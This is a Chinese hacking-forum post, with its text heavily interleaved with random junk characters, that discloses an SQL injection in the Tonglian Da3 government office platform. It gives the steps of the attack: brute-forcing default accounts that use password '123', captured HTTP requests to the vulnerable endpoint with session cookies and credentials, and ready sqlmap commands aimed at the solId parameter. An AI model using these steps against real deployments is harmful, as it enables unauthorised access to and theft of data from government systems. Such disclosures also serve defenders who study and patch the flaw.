找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1549|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

$ m, b5 U/ e- L8 r1 i
8 y7 Z7 U- {% s1 K2 F5 K3 N7 n: `

9 L+ j; @% m. _% `+ G- R

$ X: x& h* c0 x% X 平台简介: 1 ^; W) q( V( @) Z8 `. X

& j+ ^. q$ o0 V4 P8 A3 Z; P, \- |

% @) x0 {! P- K5 @3 @   3 \$ B+ t, {0 ]0 V/ @! ~4 d

, R; r/ _" v/ @% `9 P' A* _3 ]

3 N3 [. o& o9 U7 T; w% c# k+ A 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ A3 f* l/ R9 `$ D5 ]9 M. z 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ g1 D; X! k X2 l 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!* G3 {3 H- ]# _- h9 A/ U

" a/ B' e- i8 Z! w! s5 x4 |

: o+ I6 A! x2 y. T6 b   9 S9 m4 B Q# t

+ O q1 l7 e& Q. I

4 M. i" E6 Q, _( N5 |( ^% V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: , ?( e3 d- B+ ~3 y! u. u5 W

7 e$ \# N* j7 H, F0 ~' i( o4 c

+ \4 s4 T0 B" c2 k5 k# S   , @4 \ A7 c1 i0 K5 ^/ ?

% e' o0 w) e" d- t/ J7 l- C" n! d

6 ^0 k+ g7 ~! B* D5 U http://1.1.1.1:7197/cap-aco/#(案例2-) y3 q; J8 ]- Y. B& F/ f; E8 N

* p1 [' h0 C6 ]0 g$ h) W1 f8 ^

0 s9 V8 q1 o; Z1 O http://www.XXOO.com (案例1-官网网站)- o2 a% J; M; @8 E/ I. p6 P! q

1 a& l3 h3 h& T9 o$ l

( g2 {. d. q3 ]# Q5 U f8 h  & L: z* ~7 A u$ e* J# }

2 F1 D% M( K! C L- h% A! t; B

3 A9 K% ~: h8 a4 d5 C 漏洞详情: / t3 `4 S# \: j- j' n8 _

. V# `, e: G! w2 w. C+ Q- y

2 L. f6 K4 M; v! c8 D: ?4 U% ~  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试% d3 y+ r8 k1 B

" Q7 f% F$ Z* m

( r: u$ o3 O7 q/ U4 K      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:. b6 U. u5 \- Q) @$ v

) s% K+ r7 V- C D5 k

, J+ @& a$ Z( Z9 r/ s  1 `6 F" c1 W4 y+ ~

% S. U4 W* r9 |

q- t. ~8 x& K  ; N) E0 @( D/ n7 i6 U( i9 @

4 [; c$ o/ F! P# |2 t% z: T

0 V8 J% }, m2 j. A9 R status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: ! O4 H5 x% J- p$ |* G

+ D6 w- N- M# o6 M3 U7 q

7 |& X7 G- w5 X+ W0 N 1、案例1-官方网站 " B6 ~4 c% Z( `3 v3 q5 B3 c2 N

# k1 T& I! P0 [, E0 G: J% Q

3 w4 [9 l; M! I; e4 B' P GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 ! O& a' I$ R5 M- l8 V

9 q- Q1 m7 c1 i/ d5 b& ]5 J5 I

, f0 m$ S b/ B8 [. h4 j' Z- z Host: www.XXOO.com % r& a- e% C9 I1 x% R6 Y9 B

6 h# J+ Y6 Z, |: r0 l! f/ s3 h( d

. i% A# k2 v, T% V Proxy-Connection: Keep-Alive ' u: x. U* N- b: B! v1 Z f

7 L' d6 G. f( t. X: H7 B

- |, I' l3 {( l Accept: application/json, text/javascript, */*; q=0.01( s( k8 }* k9 x

- t# G- G4 U$ L# A, @) v. r

0 m( {3 V7 J. ]9 R$ g Accept-Language: zh-CN0 Q* f2 T Y- i) S. f2 {

^. F( ~4 ], ^; m& {. }

$ w3 C y. I- h9 \6 P& \. \( D# \ Content-Type: application/json ! Y* [7 I$ }% _1 ^

- s* y& a( S; N) e+ L5 Y. n! A: q

! j2 L9 I& k! |, T' ~ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 z0 Y5 T, A" v" q

" b7 _+ H1 U' T% T

- Z5 I# D' x: m4 _6 u5 |$ f X-Requested-With: XMLHttpRequest& P7 i3 i& _0 K; U0 d: P2 i5 d

( ~1 {+ L& c; E7 E% y

( k# T! X% I+ f. J Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002+ C% {" C7 E7 O+ M' s3 N

2 Y! y- B; c; V/ O7 i! K# A3 I: c% D

* N' W8 X' d. t) ~1 M& l Accept-Encoding: gzip, deflate, sdch2 A) K( F2 Q9 B. c/ i

! J( z2 K5 r, a/ ~+ `. P1 b* Q

6 D% b& \2 {3 K5 x Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e / L0 l( g2 e" j( h/ E% N& @

: Q- U ~% h% f9 t' S C

5 f! l$ x7 p$ x U& m N" b( r6 A 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 O( P! w3 L% l

" y# {' x+ `2 ^* I6 s5 o

5 E$ w2 H' X; m% Y- O   3 ]0 a" D1 f! m8 Z0 ] G

4 P% A) c) {- V

( @+ W- D9 _4 D# x# a   , p5 ~ ?) E! h$ p/ r9 N. j

. S: I) q& R5 i

6 Q$ y- Q, }4 i- t( o8 I   5 f$ ?% J$ n$ K. _6 t, }

' c. a% v! L3 B7 k

: X2 p6 b4 T2 A9 [, m- B- ]8 ]   + A4 B) w& A% H- W- R

% @ J0 k6 k' j# b" j

0 A. G1 f: F0 m  - i! b7 h* ~) { L# ~) `

3 i9 a9 w) X# e6 T. `" L6 R

+ g) }% K3 z/ x f' f9 j 2、案例2-某天河云平台 $ ~3 w/ f g* i4 t

3 ?/ j i8 z2 S

# ~4 o* ^$ }* U1 w9 i) x6 R GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 + o" [, t s' r$ ]1 d/ q3 l

: ~) }& [" ?" F4 b

+ R( d6 j7 I; r h! t; r- j Host: 1.1.1.:71973 C+ W, j) F/ ]9 V% `' E) j' j, U

, P" {/ Q g* w) E4 e2 d

6 s5 a& z) u- |6 T5 ~ Accept: application/json, text/javascript, */*; q=0.01 0 ~. F: r% ]( m; K

5 P) u% b! E) o! ~8 L

- Y: o2 z; ~ N2 j* D% [1 P- i4 C X-Requested-With: XMLHttpRequest- Q1 m* y3 @4 [1 v+ j

1 n' k: G0 b" U- U/ k+ `" l% u

; E) J( I7 }# z8 X) i9 v4 q7 z' r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0% b( F3 L/ i; @4 [; F2 v

5 X7 q. P, Y+ j; }

; E# g/ w s! t' ]$ t( o/ G+ E Content-Type: application/json 7 P, d& `" Q: I7 P0 Y& h: |

+ K/ u ^4 O0 i6 K

/ ]( Y- f e, c b8 M1 Z1 B Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 # \9 ~% h- E/ O3 J, }

+ Z+ x) E: O1 U2 f y/ E" Q" d

' t, o0 D& J, e j( w6 G* H/ G& [ Accept-Language: zh-CN,zh;q=0.8% W" C* s1 `4 H0 L( j8 l

& i0 o$ N: }+ D6 U. k' ]

7 w& ]2 L/ r) @% N1 Y u9 u" A3 F; b Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 " I# U5 A) W5 G% z( m3 w5 }- n* t

3 ?! Z3 K+ Q/ E4 j

, N B5 f8 x4 \3 ]3 w' j5 g Connection: close y, O0 I2 F6 }- }* Z: j! a

; E& w5 `) D- D- _

7 M) e2 ^) E9 d9 J# c 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 4 E K2 l; Z1 u, N, r; l( R

- K& {6 O( a# i1 k: S9 K$ C; i

% T# q1 e. B8 J W& N   / y/ m/ d. b W- Y% w* K z

! @2 K7 M4 x K' [# } s) b

5 A$ [7 S, y/ i4 \0 o& n) F2 _
5 T, ^5 j; A7 H4 n/ r# z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表